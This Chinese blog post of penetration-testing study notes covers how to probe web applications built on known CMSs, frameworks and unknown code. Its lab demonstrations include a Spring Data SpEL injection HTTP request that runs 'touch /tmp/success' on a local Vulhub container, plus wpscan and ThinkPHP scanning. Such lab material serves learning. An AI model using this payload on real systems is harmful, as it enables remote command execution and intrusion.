漏洞发现-WEB 应用之漏洞探针类型利用修复

最新推荐文章于 2024-01-26 14:23:47 发布
最新推荐文章于 2024-01-26 14:23:47 发布
阅读量401 收藏
点赞数
分类专栏: 漏洞发现 文章标签: flask spring python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45441315/article/details/120137609
版权

漏洞发现-WEB 应用之漏洞探针类型利用修复
在这里插入图片描述

已知 CMS

如常见的 dedecms.discuz,wordpress 等源码结构,这种一般采用非框架类开发,但也有少部分采用的
是框架类开发,针对此类源码程序的安全检测,我们要利用公开的漏洞进行测试,如不存在可采用
白盒代码审计自行挖掘。

开发框架

如常见的 thinkphp,spring,flask 等开发的源码程序,这种源码程序正常的安全测试思路:先获取对
应的开发框架信息(名字,版本),通过公开的框架类安全问题进行测试,如不存在可采用白盒代码审
计自行挖掘。
php:thinkphp
java:spring
python:flask

未知 CMS

如常见的企业或个人内部程序源码,也可以是某 CMS 二次开发的源码结构,针对此类的源码程序测
试思路:能识别二次开发就按已知 CMS 思路进行,不能确定二次开发的话可以采用常规综合类扫描
工具或脚本进行探针,也可以采用人工探针(功能点,参数,盲猜),同样在有源码的情况下也可以
进行代码审计自行挖掘。

演示案例:

开发框架类源码渗透测试报告-资讯-thinkphp,spring

thinkphpscan

在这里插入图片描述

vulhub spring Date

spring Date
在这里插入图片描述
在这里插入图片描述
在注册的时候抓包,并修改成如下数据包:

POST /users?page=&size=5 HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Content-Length: 124
Pragma: no-cache
Cache-Control: no-cache
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost:8080/users?page=0&size=5
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=

执行docker-compose exec spring bash进入容器中,ls查看当前有什么文件或者目录在这里插入图片描述

放行数据包,可见成功创建/tmp/success,说明命令执行成功
在这里插入图片描述

已知 CMS 非框架类渗透测试报告-工具脚本-wordpress

wordpress 是一个适用于博客到大型网站的 CMS (内容管理系统)
墨者靶场

wpscan-kali自带

wpscan-url “”
在这里插入图片描述
存在sql注入漏洞
在这里插入图片描述

已知 CMS 非框架类渗透测试报告-代码审计-qqyewu_php

在这里插入图片描述

在这里插入图片描述

x-forworded-for 伪造
审计到sql注入
在这里插入图片描述
在这里插入图片描述

硫酸超
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第43天:漏洞发现-WEB应用漏洞探针类型利用修复1
08-03
本篇主要探讨了针对不同类型的Web应用漏洞探针利用修复方法,包括对已知CMS、开发框架以及未知CMS的处理策略。 1. **已知内容管理系统(CMS)的漏洞检测** - 常见的如dedecms、discuz和wordpress等,这类CMS通常...
E008-渗透测试常用工具-使用Vega对Web进行漏洞扫描.pdf
12-02
渗透测试是网络安全领域...总的来说,通过Vega这样的工具,渗透测试人员可以系统地评估Web应用的安全性,及时发现修复潜在风险,从而提升整体网络安全。理解并熟练运用这些工具和方法对于保障Web应用的安全至关重要。
44:漏洞发现-APP应用漏洞探针类型利用修复
mingyqf的博客
05-01 764
参考:(https://www.cnblogs.com/zhengna/p/15122949.html) https://blog.csdn.net/MCTSOG/article/details/124008409 请勿非法测试,仅仅作为笔记,侵删 [44:漏洞发现-APP应用漏洞探针类型利用修复] 思维导图 思路说明: 反编译提取 URL 或抓包获取 URL,进行 WEB 应用测试,如不存在或走其他协议的情况下,需采用网络接口抓包进行数据获取,转至其他协议安全测试! APP->WEB APP-&
漏洞发现-web应用发现探针类型利用(43)
san3144393495的博客
08-30 1095
如常见的dedecms,discuz,wordpress等源码结构,这些都是网上比较知名的php源码的cms的名称,这是我们在国内常见的几个程序,论坛discuz,博客wordpress是很常见的;他们都有个特性,他们的源码是在网上可以下载到的,我们都可以去用他的源码去搭建网站,我称之为cms;开发框架是对面程序的整体或者核心是用这个框架支撑的,框架以及提前给写好了,框架就跟开发引用的模块一样,比如一个文件上传,不用框架就一个一个代码写,用框架就直接引用框架,框架就是封装好的功能代码,
漏洞发现-WEB应用漏洞探针类型利用修复
xhscxj的博客
02-13 770
站点判断 已知 CMS 如常见的 dedecms.discuz,wordpress 等源码结构,这种一般采用非框架类开发,但也有少部分采用的 是框架类开发,针对此类源码程序的安全检测,我们要利用公开的漏洞进行测试,如不存在可采用 白盒代码审计自行挖掘。 开发框架 如常见的 thinkphp,spring,flask 等开发的源码程序,这种源码程序正常的安全测试思路:先获取对 应的开发框架信息(名字,版本),通过公开的框架类安全问题进行测试,如不存在可采用白盒代码审 计自行挖掘。 未知 CMS 如常.
从零开始搭建前端监控系统(一)——web探针sdk
飞翔的熊blabla
07-22 2484
前言 本系列文章旨在讲解如何从零开始搭建前端监控系统。 项目已经开源 项目地址: github.com/bombayjs/bo… (web sdk) github.com/bombayjs/bo… (服务端,用于提供api)(未完) github.com/bombayjs/bo… (后台管理系统,可视化数据等)(未完) 您的支持是我们不断前进的动力。 喜欢请start!!! 喜欢请start!!! 喜欢请start!!! 本文是该系列第一篇,web探针sdk的设计与开发,重点讲解sdk包
漏洞发现-APP应用漏洞探针类型利用修复
xhscxj的博客
02-15 503
思路说明: 反编译提取 URL 或抓包获取 URL,进行 WEB 应用测试,如不存在或走其他协议的情况下,需采用网 络接口抓包进行数据获取,转至其他协议安全测试! APP->WEB APP->其他 APP->逆向 WEB 抓包,其他协议抓包演示及说明 未逆向层面进行抓包区分各协议测试 逆向层面进行提取 APK 代码层面数据 https://www.cnblogs.com/L0ading/p/12388928.html 案例演示: 抓包工具 WEB 协议面使用说明 抓包工具非 WEB .
信息安全技术:目录遍历漏洞概念.pptx
11-01
- **探测**:攻击者可能会使用自动化工具,如Web漏洞扫描器,来扫描Web应用程序,寻找目录遍历漏洞。此外,他们还会搜索网页标题包含“index of”的站点,因为这类页面通常显示了目录结构。 - **利用**:一旦发现...
阿江ASP探针 v1.93
10-09
这些组件的检测可以帮助开发者发现潜在的兼容性问题、安全漏洞或者性能瓶颈,从而及时进行修复和优化,确保ASP应用程序的稳定运行。 在实际应用中,阿江ASP探针可以通过监控服务器上的ASP脚本执行情况,提供诸如...
[工具查询]淘特JSP探针_tot-jsp-check.rar
最新发布
05-17
3. 安全检测:对于任何Web应用来说,安全性都是至关重要的,JSP探针可能检查常见的安全漏洞,如SQL注入、跨站脚本(XSS)等。 4. 开发工具:这是面向开发人员使用的工具,帮助他们在开发和维护过程中发现问题并修复...
网页探针,服务器探针
03-24
php写的网页探针,可取得服务器信息 php写的网页探针,可取得服务器信息
wspa:Web扫描探针分析-用于SPM数据处理的基于Web的工具-开源
04-29
Web扫描探针分析-基于Web的工具,用于基于gnudatalanguage从SPM(STM,AFM)获取数据。 -用于数据管理和处理的基于Web的界面-支持多种数据格式(GXSM,WSXM,Omicron SCALA,Createk)-统一,可编辑的图像过滤功能,用途广泛
网站空间探针
11-08
WEB探针,RAR压缩包,里面包括了四种不同语言的探针,包括:asp\asp.net\php\jsp
网页探针webSpy2.0 2.7
09-16
一个免费、开源、绿色免安装的web开发必备辅助工具,可以方便的查看页面任意对象的HTML源码、CSS样式,支持框架穿透模式,可自动生成模拟控制代码支持框架穿透。   支持跨域框架探测、自动化控制。   自动捕获弹出窗体。   自动生成自动化控制代码,自动还原滚动条,可实时测试运行。   点击“相关”按钮,可查询当前探测对象的帮助文档,列出对象的属性、方法。
第43天-漏洞发现-WEB应用漏洞探针类型利用修复
MCTSOG的博客
04-05 5076
思维导图 相关概念 已知 CMS 如常见的 dedecms.discuz,wordpress 等源码结构,这种一般采用非框架类开发,但也有少部分采用的 是框架类开发,针对此类源码程序的安全检测,我们要利用公开的漏洞进行测试,如不存在可采用 白盒代码审计自行挖掘。 开发框架 如常见的 thinkphp,spring,flask 等开发的源码程序,这种源码程序正常的安全测试思路:先获取对 应的开发框架信息(名字,版本),通过公开的框架类安全问题进行测试,如不存在可采用白盒代码审 计自行挖掘。 未知 CMS 如
43 漏洞发现-WEB应用漏洞探针类型利用修复
山兔的博客
01-26 972
漏扫能扫出来的工具,网上早就公开了,大部分网上公开漏洞,都是通过网站的代码分析到的,我们知道cms结构之后,思路直接跳到工具框架这里来,不要直接用漏扫去扫,在网上找它的漏洞就完事了,因为检测工具有漏洞,网站绝对有,如果网站没有,漏扫也绝对不会扫出来,扫出来的大部分是误报。有的在网上有直接的利用工具,我们直接利用,有的没有,那就利用网上的相关资讯,复现的过程,漏洞的介绍,再寻找利用的文章,按步就搬的来就完事了。
操作系统之漏洞探针类型利用修复之web
m0_61786761的博客
09-01 599
4.cms和框架的区别:cms就是将网站的栏目和模型全部开发好了,用户可以直接使用,它是傻瓜级操作,而框架只是面向程序员的,普通用户是用不了的,因为看不懂。已知cms:漏洞平台:cnvd,seebug,1337day,exploit-db,packet storm security。1.主机漏洞发现工具:goby , nmap , nessus , openvas , nexpose。3.利用:工具框架:metasploit , searchsploit , 企业单位内部产品。5.代码审计:(未知cms)
漏洞发现-APP 应用漏洞探针类型利用修复
硫酸超的博客
09-20 447
漏洞发现-APP 应用漏洞探针类型利用修复思路说明案例演示:抓包工具 WEB 协议面使用说明抓包工具非 WEB 协议面使用说明安卓逆向便捷 APK 一键提取 URL 演示 思路说明 反编译提取 URL 或抓包获取 URL,进行 WEB 应用测试,如不存在或走其他协议的情况下,需采用网络接口抓包进行数据获取,转至其他协议安全测试 #APP->WEB APP->其他 APP->逆向 #WEB 抓包,其他协议抓包演示及说明 #未逆向层面进行抓包区分各协议测试 #逆向层面进行提取 APK 代码
WEB各个架构信息探针实战
qq_43119556的博客
07-10 739
探针服务器操作系统: Window Linux 大小写敏感 Window 大小写不敏感 Linux 大小写敏感 探针服务器搭建平台: 审查元素 探针网站应用脚本语言 探针网站应用数据库类型: 端口扫描: 扫描工具 组合判断: Linux不存在asp aspx Linux不存在iis Asp+access php+mysql asp+mssql jsp+mssql oracle ...
STM32F103调试探针用户指南 - J-Link OB
"JLinkOBSTM32F103.pdf是SEGGER Microcontroller GmbH公司的一份用户指南,详细介绍了基于STM32F103微控制器的板载调试探针——J-Link-OB的使用方法和技术细节。文档UM08023修订版为1,发布日期为2018年1月18日。" ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值